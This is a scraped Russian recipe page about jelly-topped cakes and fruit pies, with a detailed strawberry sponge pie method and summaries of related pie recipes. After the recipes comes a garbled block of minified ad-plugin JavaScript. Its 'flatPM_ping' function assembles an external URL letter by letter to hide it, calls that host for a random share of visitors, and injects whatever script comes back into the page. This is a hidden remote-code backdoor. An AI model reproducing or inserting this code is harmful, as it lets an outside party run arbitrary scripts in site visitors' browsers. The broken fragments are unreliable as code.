Пирог с желе

Торт с желе

Торт “Книга”

Ко Дню рождения Поваренка вышла книга: “Все о поварятах на сайте Поваренок. ру” – автор Jane. На сегодняшний день продажа составляет 80 тыс. экземпляров. Но, судя по ажиотажу вокруг нее, она разойдется миллионным тиражом. Спешу поздравить Поваренка бисквитным тортом с “пьяным” яблочно-лимонным желе с корицей и воздушным винным кремом.

Постный “Томатно-апельсиновый” торт

Петров пост. как хочется сладкого и печеного. Вот и испекла. Вкусный, постный торт. С нежным вкусом апельсина. Понравился всем – и постящимся, и нет.

Торт “Детский каприз”

Собиралась в гости к подружке, она решила нас у себя собрать по поводу, так сказать, новоселья. Т. к. они знают, что я довольно-таки часто пеку, сказали – без торта к ним не приходить! Я селала торт полностью на свой вкус. но оказалось, что не только на свой. Т. к. он всем ну очень сильно, можно даже сказать – безумно понравился. Действительно, он необычайно вкусный. Пропитанный, влажный бисквит, воздушный крем, фрукты, безе. ну что еще нужно.

Бисквитная корзинка с ягодами

Этот невероятно вкусный и нежный торт может стать как достойным украшением праздничного стола, так и просто порадовать Вас и Ваших близких во время домашнего чаепития! Лёгкий, яркий, фруктовый торт с приятной освежающей кислинкой от ягод. Пеку его с огромным удовольствием по рецепту замечательного кулинара Нины Г.

Необычный торт с клубничным желе

Интересный и не совсем обычный десерт без выпечки, который я увидела на польском кулинарном сайте, изменила и подстроила по своему вкусу. Прост в приготовлении, доступен по составляющим, легкий, а самое главное вкусный. Нравится и взрослым и детям, попробуйте!

Торт “Улитка”

Вкусный, нарядный и легкий во всех отношениях торт порадует не только детей, но приятно удивит взрослых!

Творожный торт с клубникой

Лeгкий творожный торт, причeм во всех смыслах – легко приготовить, легко съесть ))) Летом очень часто готовлю его с разными ягодами-фруктами. Но с клубникой, конечно, это самый любимый вариант! Подойдeт как для повседневного поедания, так и для праздничного стола. И к тому же, я искренне верю, что творог да с ягодами – это очень полезно и антицеллюлитно )))

Торт “Бейжа”

Торт с бананами, маковыми коржами и желе. Я посвящаю этот торт всем своим учителям! Спасибо вам за ваш нелeгкий труд. “Школьная пора”. Ностальгия.

Торт-суфле

Простой в приготовлении, вкусный тортик, подойдет к любому празднику.

Желейно-персиковый торт

Этот рецепт для любителей желе. Также он, наверное, особо порадует тех, кто сидит на диете, так как это очень легкий десерт, который может себе позволить любая модница.

Торт с желе. Торт с желе

Обычно торт никак не назовешь легким блюдом. Дрожжевое тесто, жирный крем, глазурь… Но торт с желе – это совершенно другое дело. Торт с желе – это гораздо менее калорийное лакомство, которое будет весьма кстати даже в жаркий летний день. Ведь желе прекрасно освежает!

Изобретение желатина принадлежит американцу Питеру Куперу. За сто лет своего существования лакомство нисколько не утратило актуальности. Хозяйки очень любят желе за то, что оно быстро готовится и всегда уходит на «ура» – как у детей, так и у взрослых.

Можно приготовить торт с желе вот по такому простому рецепту. Желатин залить холодной кипяченой водой, оставить набухать, затем откинуть на дуршлаг, смешать с соком и сахаром. Прогреть до растворения, не давая закипеть, охладить.

Смешать муку и сахар, добавить масло, разрыхлитель, желтки яиц и замесить тесто. Раскатать, выложить в форму, смазанную маслом. Выпекать в духовом шкафу до золотистого цвета.

Коржи разрезать на два «уровня», прослоить в середине джемом. Поверхность тоже можно слегка смазать джемом, выложить ягоды, нарезанные фрукты, залить желе на торт тонким слоем, охладить, еще немного долить, снова охладить и т.д. Готовый торт поставить в холодильник. Подавать, когда желе полностью застынет.

В качестве прослойки для торта с желе может служить не только варенье, но и любой крем – например, сметанный. Края торта можно тоже оригинально оформить – например, масляным кремом, кокосовой стружкой или крошкой, оставшейся от выпечки коржей.

Для приготовления торта лучше всего брать упаковки разноцветного желе – благодаря радуге десерт будет смотреться более эффектно и празднично.

Четыре вкуса

Популярные публикации

Последние комментарии

Заливной фруктово-ягодный пирог : легкий и аппетитный мастер-класс!

Такой пирог знаю ооооочень давно. Его пекла моя подруга в специальной форме, которую еще в далекие советские времена привезла из ГДР, где служил ее отец. Форма эта была предметом моей жуткой белой зависти, а пирог в ней казался мне верхом кулинарного мастерства. Он тогда, в наше неискушенное время, вызывал восхищение и восторги на фоне банальных сметанников и праздничных Наполеонов.


Теперь, к счастью, приобрести такую форму не проблема, мне первой попалась эта небольшая жестяная, всего 20 см в диаметре.

Потом я купила большую тефлоновую.

В продаже есть еще подобные силиконовые, но у меня нет.

Для этого пирога я делаю бисквит по этому рецепту:это рецепт шарлотки, а рецепт теста отлично подойдет нашему заливному пирогу.

“1) Включаю духовку на 180 град.
2) На сковородке тефлоновой диам. 29 см растапливаю немного (30-40 г) сливочного масла(иногда и без него), сыплю 3-4 ст.л. сахара. Крошу в сковородку 3-5 яблок (желательно кислых) и тушу их, понемногу посыпая сахаром. Как только сок испарится и яблоки готовы, отставляю и остужаю. Еще очень вкусно делать яблоки с полукружками апельсинов со шкуркой, так же жарить (в этот раз на фото не было апельсина).
3)В миске для миксера взбиваю 3 холодных белка с 1 стак. сахара и щепоткой лим. кислоты, взбиваю до мягких пиков. Добавляю 3 желтка и 1 стак. муки, осторожно перемешиваю снизу вверх и выливаю на сковородку сверху яблок.”

1. Включаем духовку на 180 град.

2. Форму смазываем маслом и припыливаем мукой.

3. Готовим тесто.

4. Перекладываем тесто в форму.

5. Ставим в духовку на 25 минут.

6. Достаем бисквит и немного остужаем.

7. Переворачиваем корж на блюдо вверх ногами.

8. Далее украшаем наш пирог.

На поверхности коржа раскладываем любые фрукты, у меня сегодня клубника.

9. Варим желе. Для этого пирога идеально использовать «Желе для торта» D-r Oetker, оно бывает такое

бывает еще такое другой фирмы

Для этого пирога хватит 1 пакетика. Для клубники я использую красное желе. Для некрасных фпуктов-ягод использую бесцветное желе. Готовим его согласно инструкции на пакетике.

Желе надо немного остудить и залить нашу клубнику, начиная от центра. Заливать надо быстро, желе моментально схватывается. Если у вас осталось неиспользованное желе в миске, его можно снова растопить и опять заливать.

Если зальете горячим желе, то оно впитается в бисквит. Желе должно быть примерно 50-55 градусов.

Получается вот такая красота!

А теперь самое интересное! Этот пирог можно печь весь год. Фрукты-ягоды кладите по сезону, вот вам некоторые мои пироги.

В общем, что есть под рукой, то и кладите в художественном порядке

На бисквит можно тонко намазать любой крем, какой вам нравится, я не мажу, мне и так вкусно)))

Очень легкий, очень вкусный пирог, делается легко и так же легко съедается)))

P.S. Работа с желе требует небольшого навыка, он придет после 2-3 пирога.

Такое желе можно заменить обычным желе в пакетах, только воды взять вдвое меньше по рецепту. Но лучше все же специальное «Для торта». Не забывайте остудить желе!

Корж можете печь из теста по вашему любимому рецепту. Просто я люблю бисквит)))

Как выпечь такой пирог без такой формы? Только из песочного теста, где можно сформировать бортик. Или из бисквита выбрать серединку.

Понравилась статья? Подпишитесь на канал, чтобы быть в курсе самых интересных материалов

Пирог с желе

Яркий ягодный пирог с желе прекрасно подойдет для вечернего чаепития в летнюю погоду. Рецепт пирога с желе и фруктами настолько прост, что под силу даже ребенку.

Ингредиенты

  • 750 гр клубники (или любых других ягод)
  • 200 мл сока (желательно из тех же ягод, которые используются для начинки)
  • 2 яйца
  • 120 гр муки
  • 80 гр сахара (+ 2 ст.л. сахара)
  • 70-80 гр сливочного масла
  • 1 ст.л. крахмала (без горки)
  • 10 гр ванильного сахара
  • 1-2 ч.л. желатина
  • 1 ч.л. разрыхлителя
  • щепотка соли

Рецепт приготовления блюда в домашних условиях

  1. Начать с приготовления бисквита для пирога с желе. Масло вынуть из холодильника и оставить в тепле на 15 минут. Вместо этого можно подержать масло пару минут на водяной бане. Духовку разогреть до 180С, форму для выпечки смазать кусочком сливочного масла или застелить пергаментной бумагой.
  2. К подтаявшему маслу добавить сахар и взбить миксером до пышности. Не переставая взбивать, вбить по одному яйца и смешивать до полной однородности. Муку просеять вместе с солью и разрыхлителем в яично-масляную массу и вымешать до однородности.
  3. Выложить тесто в форму и равномерно распределить его по дну, сформировать бортики около 2-3 см. Отправить форму в разогретый духовой шкаф. Выпекать бисквит для пирога примерно 20-25 минут. Вынуть форму и оставить остывать.
  4. Тем временем приготовить начинку из фруктов для пирога с желе. Ягоды перебрать, промыть, если нужно – очистить от косточек или кожуры. При необходимости порезать ягод на кусочки. Сложить подготовленные фрукты в миску и засыпать 2 ложками сахара. Оставить на 20-30 минут.
  5. Если вы измельчали фрукты, засыпать поверхность бисквита равномерным слоем крахмала. Это делается для того, чтобы сок не пропитал бисквит. Слить лишний сироп с ягод и выложить на бисквитную основу.
  6. Желатин залить соком и оставить на 15 минут. Затем поставить емкость на водяную баню и нагревать, помешивая, до полного растворения желатина. Затем снять желе с водяной бани и оставить остывать. Залить бисквит с ягодной начинкой остывшим желе и отправить в холодильник.
  7. Пирог с желе должен настояться в холодильнике не менее получаса. Когда застынет желе, пирог можно вынуть из холодильника, аккуратно вынуть на блюдо, украсить и нарезать порционными кусочками. Приятного чаепития!

Похожие рецепты:

Пирог “Будайская крепость”: рецепт с фото

120 мин. / Средне

Киш с брокколи и вялеными помидорами: рецепт с фото

Картофельный пирог с маком: рецепт с фото

Пирог “Жербо”: рецепт с фото

240 мин. / Средне

Пирог с абрикосовым повидлом: рецепт с фото

Дрожжевой пирог со свеклой, козьим сыром и орехами в духовке: рецепт с фото

Рецепты пирогов с желе

Самые лучшие рецепты пирогов с желе собраны здесь. Вы их всегда найдете в рецептах пирогов. Еще у нас есть семнадцать рецептов пирогов с киви.

Пирог с эремчеком

Для песочного теста размягченное масло разотрите с сахаром в однородную массу, добавьте яйцо и желток. Продолжая растирать массу, введите в нее гашенную лимонным соком соду, соль, цедру и растирайте смесь до полного растворения сахара. Всыпьте муку и замесите тесто. . Потребуется: мука пшеничная – 160 г, масло сливочное – 125 г, сахар – 70 г, яйцо – 1/2 шт., яичный желток – 1/2 шт., цедра лимона тертая – 1/2 ч. ложки, сок лимонный – 1/2 ч. ложки, соль – 1 щепотка, сода пищевая – на кончике ножа, конфитюр – 2 ст. ложки, сыр маскарпоне.

Английский пирог со свининой

1. Для теста охлажденные масло и шпик нарежьте мелкими кубиками (0,5 см), посыпав нож мукой, чтобы масло не налипало. Смешайте масло с мукой и шпиком так, чтобы образовалась рыхлая масса. 2. Яйцо смешайте с таким количеством холодной вод. Потребуется: сливочное масло – 225 г, шпик свиной – 225 г, мука пшеничная – 450 г, яйцо – 1 шт., вода, мякоть свинины (корейка) – 675 г, окорок копченый – 250 г, лук репчатый – 70 г, чеснок – 18 г, сливочное масло – 15 г, бульон куриный – 125 мл, листья тимья.

Пирог кокосовый с виноградом

Соедините муку, кокосовую стружку, половину нормы сахара, масло сливочное, перемешайте, затем измельчите в блендере до консистенции крошки, высыпьте в смазанную маслом форму, слегка уплотните, чтобы получился корж с бортиком и выпекайте при&n. Потребуется: мука пшеничная – 1 стакан, стружка кокосовая – 1/2 стакана, сахар – 6 ст. ложек, сливочное масло – 6 ст. ложек, творог нежирный – 250 г, сметана – 2 ст. ложки, корень имбиря тертый – 2 ст. ложки, виноград черный – 100 г, виноград зеленый – 100 г, ж.

Из муки, масла, яиц, сахара и соли замесите тесто, скатайте его в шар, заверните в пленку и поставьте в холодильник на 1 час. Для крема яичные желтки взбейте с сахаром и маслом в пышную пену. Творог смешайте с цед. Потребуется: мука пшеничная – 400 г, масло сливочное – 250 г для теста и 125 г – для крема, сахар – 3 ст. ложки для теста и 200 г – для крема, яйцо – 2 шт. для теста и 6 шт. – для крема, соль – 1 щепотка, творог нежирный – 1,5 кг, крем заварной (полуфабрикат) – 2 паке.

Творожный пирог с малиной

Масло, сахар, ванильный сахар и соль соедините и взбейте до однородной консистенции. Не прекращая взбивания, введите по одному яичные желтки, затем добавьте творог, молоко, манку и цедру, перемешайте. Яичные белки взбейте в устойчив. Потребуется: тесто слоеное – 230 г, цедра тертая 1 лимона, крупа манная – 4 ст. ложки, молоко – 3 ст. ложки, яйцо – 4 шт., соль – 1 щепотка, ванильный сахар – 1 пакетик, сахар – 100 г, масло сливочное или маргарин – 75 г, творог – 750 г, малина – 500 г, желе из.

Открытый пирог с фруктами

Для теста просейте муку с солью и разотрите с маргарином до получения мелкой крошки, добавьте 2 ст.ложки сахара, взбитое яйцо, воду (или молоко), перемешайте до получения однородной массы. Выдерживайте в холодильнике в течение 1 часа. Приготовьте заварной крем. Потребуется: яйцо – 1 шт., сахар для теста и для начинки – по 2 ст. ложки, маргарин – 125 г, мука пшеничная – 200 г, вода или молоко – 2 ст. ложки, соль – щепотка, ягоды и фрукты свежие – 400 г, крем заварной – 1 пакет, желе для торта светлое – 1 пакет

1. Смешайте муку, сахар и 150 г масла, чтобы получилось нечто похожее на хлебные крошки. Добавьте воду и замесите тесто. Уберите в холодильник на 1 час. 2. Смешайте в кастрюле сливки, яичные желтки, сахарную пудру, муку и&. Потребуется: мука пшеничная для теста и сливок – 180 г и 1 ст.ложка, сахар – 2 ст. ложки, масло сливочное охлажденное – 150 г плюс 1 ч. ложк, вода ледяная для теста и для желе – 2-3 ст. ложки и 50 г, сливки – 300 г, яичный желток – 3 шт., сахарная пудра для теста и д.

Пирог цитрусовый Полет фантазии

Начинаем с коржа: Муку просеять, в нее выложить холодный маргарин и все мелко порубить ножом. Добавить сметану и воду.Замесить тесто завернуть его в пленку и положить на 1 час в холодильник. Далее распределить тесто по дну форму и хорошенько его проколо. Потребуется: Для коржа: 100 г сливочного масла или маргарина, 1 ст. муки, 1 ст.л. сметаны(йогурт), 40 мл. кипяченой(не горячей. ) воды, Для начинки: 1 банка сгущенки( не вареной!), 3 желтка, сок 1,5 лимона, , Для заливки и украшения: 1 апельсин, 1/2 пачки апельсинового.

Пирог с творогом и киви

Смазать форму маргарином, выложить тесто. Сверху еще посыпать ванильным сахаром. На фотографии, если присмотерться, это видно. Нужно растереть маргарин с сахаром и ванильным сахаром. Добавляем яйцо, разрыхлитель, муку. Замешиваем тесто. Начинка. Отделяем желтки от бе. Потребуется: Тесто: Маргарин – 150 г., Сахар – 150 г., Яйцо – 1, Ванильный сахар – 8-10 г (пакетик), 300 – 350 г муки, Разрыхлитель (или гашеная сода) – 1,5 ч.л., —————————————-, Начинка: Творог – 300 г (1,5 упаковки), Творожная масса с цукатам.

Разогрейте духовку до 180градусов. Разотрите масло с сахаром добела, взбивая добавьте ваниль. Добавьте яйцо, хорошо взбейте. Продолжая взбивать добавьте миндаль и муку. Вымесить тесто до однородной массы. В смазанную сливочным маслом форму разложите тесто (на дно и н. Потребуется: 150гр. сливочного масла, 150гр. сахара, пара капель ванильной эссенции, 1 яйцо, 100гр. молотого миндаля, 175гр. муки, 500гр. вашего любимого желе

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Оцените рецепт ОценитьПрименить